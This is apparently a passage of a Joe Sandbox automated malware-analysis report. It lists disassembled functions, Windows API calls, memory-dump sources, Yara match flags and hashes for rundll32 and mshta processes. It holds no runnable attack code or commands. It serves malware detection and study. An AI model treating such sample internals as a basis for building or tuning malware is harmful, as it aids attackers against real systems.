                                            • memcpy.NTDLL(00000000,004F0053,76C869A0,?,?,049F6861,004F0053,04F793CC,?,?,?,?,?,?,049F6BB4), ref: 049F623A
                                            • memcpy.NTDLL(76C869A0,049F6861,00000002,00000000,004F0053,76C869A0,?,?,049F6861,004F0053,04F793CC), ref: 049F624D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrlenmemcpy$AllocateHeap
                                            • String ID:
                                            • API String ID: 2411391700-0
                                            • Opcode ID: c446165816da017447d7593d121c02f821fc82fd090d0f430ba0b0f70a1d0b45
                                            • Instruction ID: 2087b362776fb3695ebdb607dfa4a834bafb8670cfaadf97ed250e92743f6665
                                            • Opcode Fuzzy Hash: c446165816da017447d7593d121c02f821fc82fd090d0f430ba0b0f70a1d0b45
                                            • Instruction Fuzzy Hash: 24F0E776900119BB9F11EFE9CC89CDF7BACEF892587154072EE04D7201E635EE159BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05815350 Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(69B25F44,?,?,00000000,0581385A,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 05815361
                                            • lstrlen.KERNEL32(?,?,?,?), ref: 05815366
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 05815382
                                            • lstrcpy.KERNEL32(00000000,?), ref: 058153A0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                            • String ID:
                                            • API String ID: 1697500751-0
                                            • Opcode ID: c5fd3c18152988ee3cacf4a9d64ce640f0c8305d35bc20e99016adbb7bbd5886
                                            • Instruction ID: 6a62b759af7909b63128ef702136d6e6de5d82dddaa673756eed2c905872a9d6
                                            • Opcode Fuzzy Hash: c5fd3c18152988ee3cacf4a9d64ce640f0c8305d35bc20e99016adbb7bbd5886
                                            • Instruction Fuzzy Hash: DEF0CDBB508B41ABD7219AAAAC8CE1BBF9CBBC6311B094415FD46C3200D731D8048BB2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3970 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(04F79B90,00000000,00000000,75BCC740,049F6568,00000000), ref: 049F3980
                                            • lstrlen.KERNEL32(?), ref: 049F3988
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • lstrcpy.KERNEL32(00000000,04F79B90), ref: 049F399C
                                            • lstrcat.KERNEL32(00000000,?), ref: 049F39A7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                            • String ID:
                                            • API String ID: 74227042-0
                                            • Opcode ID: 0eee967f5c49b7c987e548bec1c1c4155d2c8170377ab19cb52f82eede1b5579
                                            • Instruction ID: 439aa57f53ac7b3d47a7507da66c953571dabf7aab47245f0845fbe035f9b8a9
                                            • Opcode Fuzzy Hash: 0eee967f5c49b7c987e548bec1c1c4155d2c8170377ab19cb52f82eede1b5579
                                            • Instruction Fuzzy Hash: 6CE09273505620AB87119BA8AC48C9BBFACEFC96617080436FE00D3100C729AC01CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581E631 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(05D78560,00000000,00000000,76CC81D0,0580ACFB,00000000), ref: 0581E641
                                            • lstrlen.KERNEL32(?), ref: 0581E649
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(00000000,05D78560), ref: 0581E65D
                                            • lstrcat.KERNEL32(00000000,?), ref: 0581E668
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                            • String ID:
                                            • API String ID: 74227042-0
                                            • Opcode ID: fdf685f8036bf3bca6df3d3147f6bb8121645d2dc4615aa9569eba3ccfefacbb
                                            • Instruction ID: 3b2e1da8ff72064fb26c4e3468409eea44c6c85b03c0e31de1e712ef9c446457
                                            • Opcode Fuzzy Hash: fdf685f8036bf3bca6df3d3147f6bb8121645d2dc4615aa9569eba3ccfefacbb
                                            • Instruction Fuzzy Hash: 3FE09233911220A78A219BE8AC4CC5FFFACEFC96117048416FE01D3110CB21A800CBB6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Executed Functions

                                            Function 000002376B0E0FB2 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000017.00000003.329029258.000002376B0E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002376B0E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_23_3_2376b0e0000_mshta.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                                            • Instruction ID: 0e7ab654e62692a67c5164f66ca4c7807296d2dd7e412f3432e251b67a1fd6df
                                            • Opcode Fuzzy Hash: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                                            • Instruction Fuzzy Hash: FCB0920446EE8A4EDA1212B30C6A2592F60AA47114FC919C68045C9092E40C069A5222
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 000002376B0E0FC1 Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000017.00000003.329029258.000002376B0E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002376B0E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_23_3_2376b0e0000_mshta.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                            • Instruction ID: a75c39cd1706a91c408f836368424cf0a4f1070eb0cff60411727cba2b91e563
                                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                            • Instruction Fuzzy Hash: C290024449DC0E55D82411D20C5B75C55446389150FD44880841694544E84D03A71552
                                            Uniqueness

                                            Uniqueness Score: -1.00%